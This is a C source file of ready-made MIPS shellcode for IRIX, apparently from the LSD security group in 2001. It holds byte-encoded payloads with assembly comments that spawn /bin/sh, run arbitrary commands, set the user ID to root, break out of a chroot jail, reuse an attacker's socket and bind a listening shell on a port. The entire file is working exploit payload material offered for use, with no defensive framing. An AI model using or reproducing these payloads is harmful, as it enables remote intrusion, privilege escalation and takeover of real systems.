/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for irix 5.3 6.2 6.3 6.4 6.5 6.5.10 mips                       #*/

/*
syscall     %v0  %a0,%a1,%a2,%a3
----------- ---- ---------------------------------------------------------------
execv       x3f3 ->path="/bin/sh",->[->a0=path,0]
execv       x3f3 ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
getuid      x400  
setreuid    x464 ruid,euid=0
mkdir       x438 ->path="a..",mode= (each value is valid)
chroot      x425 ->path={"a..","."}
chdir       x3f4 ->path=".."
getpeername x445 sfd,->sadr=[],->[len=605028752]
socket      x453 AF_INET=2,SOCK_STREAM=2,prot=0
bind        x442 sfd,->sadr=[0x30,2,hi,lo,0,0,0,0],len=0x10
listen      x448 sfd,backlog=5
accept      x441 sfd,0,0
close       x3ee fd={0,1,2}
dup         x411 sfd
*/

#if defined(MIPS) && defined(IRIX)

char shellcode[]=          /* 9*4+7 bytes                    */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<shellcode>      */
    "\x24\x02\x03\xf3"     /* li      $v0,1011               */
    "\x23\xff\x01\x14"     /* addi    $ra,$ra,276            */
    "\x23\xe4\xff\x08"     /* addi    $a0,$ra,-248           */
    "\x23\xe5\xff\x10"     /* addi    $a1,$ra,-220           */
    "\xaf\xe4\xff\x10"     /* sw      $a0,-220($ra)          */
    "\xaf\xe0\xff\x14"     /* sw      $zero,-236($ra)        */
    "\xa3\xe0\xff\x0f"     /* sb      $zero,-241($ra)        */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "/bin/sh"
;

char cmdshellcode[]=       /* 14*4+12+cmdlen bytes           */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<cmdshellcode>   */
    "\x24\x02\x03\xf3"     /* li      $v0,1011               */
    "\x23\xff\x08\xf0"     /* addi    $ra,$ra,2288           */
    "\x23\xe4\xf7\x40"     /* addi    $a0,$ra,-2240          */
    "\x23\xe5\xfb\x24"     /* addi    $a1,$ra,-1244          */
    "\xaf\xe4\xfb\x24"     /* sw      $a0,-1244($ra)         */
    "\x23\xe6\xf7\x48"     /* addi    $a2,$ra,-2232          */
    "\xaf\xe6\xfb\x28"     /* sw      $a2,-1240($ra)         */
    "\x23\xe6\xf7\x4c"     /* addi    $a2,$ra,-2228          */
    "\xaf\xe6\xfb\x2c"     /* sw      $a2,-1236($ra)         */
    "\xaf\xe0\xfb\x30"     /* sw      $zero,-1232($ra)       */
    "\xa3\xe0\xf7\x47"     /* sb      $zero,-2233($ra)       */
    "\xa3\xe0\xf7\x4a"     /* sb      $zero,-2230($ra)       */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "/bin/sh -c  "
    /* command */
;

char setreuidcode[]=       /* 7*4 bytes                      */
    "\x24\x02\x04\x01"     /* li      $v0,1024+1             */
    "\x20\x42\xff\xff"     /* addi    $v0,$v0,-1             */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x30\x44\xff\xff"     /* andi    $a0,$v0,0xffff         */
    "\x30\x05\xff\xff"     /* andi    $a1,$zero,0xffff       */
    "\x24\x02\x04\x64"     /* li      $v0,1124               */
    "\x03\xff\xff\xcc"     /* syscall                        */
;

char chrootcode[]=         /* 18*4 bytes                     */
    "\x30\x61.."
    "\x04\x10\xff\xff"     /* bltzal  $zero,<chrootcode+4>   */
    "\xaf\xe0\xff\xf8"     /* sw      $zero,-8($ra)          */
    "\x23\xe4\xff\xf5"     /* addi    $a0,$ra,-11            */
    "\x24\x02\x04\x38"     /* li      $v0,1080               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x23\xe4\xff\xf5"     /* addi    $a0,$ra,-11            */
    "\x24\x02\x04\x25"     /* li      $v0,1061               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x24\x11\x01\x01"     /* li      $s1,257                */
    "\x23\xe4\xff\xf6"     /* addi    $a0,$ra,-10            */
    "\x24\x02\x03\xf4"     /* li      $v0,1012               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x31\xff\xff"     /* addi    $s1,$s1,-1             */
    "\x06\x21\xff\xfb"     /* bgez    $s1,<chrootcode+40>    */
    "\x23\xe4\xff\xf7"     /* addi    $a0,$ra,-9             */
    "\x24\x02\x04\x25"     /* li      $v0,1061               */
    "\x03\xff\xff\xcc"     /* syscall                        */
;

char findsckcode[]=        /* 29*4 bytes                     */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<findsckcode>    */
    "\x24\x10\x01\x90"     /* li      $s0,400                */
    "\x22\x11\x01\x9c"     /* addi    $s1,$s0,412            */
    "\x22\x0d\xfe\x94"     /* addi    $t5,$s0,-(400-36)      */
    "\x03\xed\x68\x20"     /* add     $t5,$ra,$t5            */
    "\x01\xa0\xf0\x09"     /* jalr    $s8,$t5                */
    "\x97\xeb\xff\xc2"     /* lhu     $t3,-62($ra)           */
    "\x24\x0c\x12\x34"     /* li      $t4,0x1234             */
    "\x01\x6c\x58\x23"     /* subu    $t3,$t3,$t4            */
    "\x22\x0d\xfe\xbc"     /* addi    $t5,$s0,-(400-76)      */
    "\x11\x60\xff\xf9"     /* beqz    $t3,<findsckcode+16>   */
    "\x22\x24\xfe\xd4"     /* addi    $a0,$s1,-300           */
    "\x23\xe5\xff\xc0"     /* addi    $a1,$ra,-64            */
    "\x23\xe6\xff\xfc"     /* addi    $a2,$ra,-4             */
    "\x24\x02\x04\x45"     /* li      $v0,1093               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x31\xff\xff"     /* addi    $s1,$s1,-1             */
    "\x10\xe0\xff\xf4"     /* beqz    $a3,<findsckcode+24>   */
    "\x22\x2b\xfe\xd4"     /* addi    $t3,$s1,-300           */
    "\x1d\x60\xff\xf7"     /* bgzt    $t3,<findsckcode+44>   */
    "\x22\x04\xfe\x72"     /* addi    $a0,$s0,-398           */
    "\x24\x02\x03\xee"     /* li      $v0,1006               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x24\xfe\xd5"     /* addi    $a0,$s1,-299           */
    "\x24\x02\x04\x11"     /* li      $v0,1041               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x10\xff\xff"     /* addi    $s0,$s0,-1             */
    "\x22\x0b\xfe\x72"     /* addi    $t3,$s0,-398           */
    "\x05\x61\xff\xf7"     /* bgez    $t3,<findsckcode+80>   */
;

char bindsckcode[]=        /* 31*4 bytes                     */
    "\x30\x02\x12\x34"
    "\x04\x10\xff\xff"     /* bltzal  $zero,<bindsckcode+4>  */
    "\x24\x11\x01\xff"     /* li      $s1,511                */
    "\xaf\xe0\xff\xf8"     /* sw      $zero,-8($ra)          */
    "\x22\x24\xfe\x03"     /* addi    $a0,$s1,-509           */
    "\x22\x25\xfe\x03"     /* addi    $a1,$s1,-509           */
    "\x22\x26\xfe\x01"     /* addi    $a2,$s1,-511           */
    "\x24\x02\x04\x53"     /* li      $v0,1107               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x30\x44\xff\xff"     /* andi    $a0,$v0,0xffff         */
    "\x23\xe5\xff\xf4"     /* addi    $a1,$ra,-12            */
    "\x22\x26\xfe\x11"     /* addi    $a2,$s1,-(511-16)      */
    "\x24\x02\x04\x42"     /* li      $v0,1090               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x25\xfe\x06"     /* addi    $a1,$s1,-506           */
    "\x24\x02\x04\x48"     /* li      $v0,1096               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x25\xfe\x01"     /* addi    $a1,$s1,-511           */
    "\x22\x26\xfe\x01"     /* addi    $a2,$s1,-511           */
    "\x24\x02\x04\x41"     /* li      $v0,1089               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x02\x22\x98\x20"     /* add     $s3,$s1,$v0            */
    "\x22\x32\xfe\x03"     /* addi    $s2,$s1,-509           */
    "\x02\x40\x20\x25"     /* move    $a0,$s2                */
    "\x24\x02\x03\xee"     /* li      $v0,1006               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x64\xfe\x01"     /* addi    $a0,$s3,-511           */
    "\x24\x02\x04\x11"     /* li      $v0,1041               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x52\xff\xff"     /* addi    $s2,$s2,-1             */
    "\x06\x41\xff\xf8"     /* bgez    $s2,<bindsckcode+92>   */
;

char jump[]=
    "\x03\xa0\x10\x25"     /* move    $v0,$sp                */
    "\x03\xe0\x00\x08"     /* jr      $ra                    */
;

#define FINDSCKPORTOFS     30
#define BINDSCKPORTOFS     2 

#endif
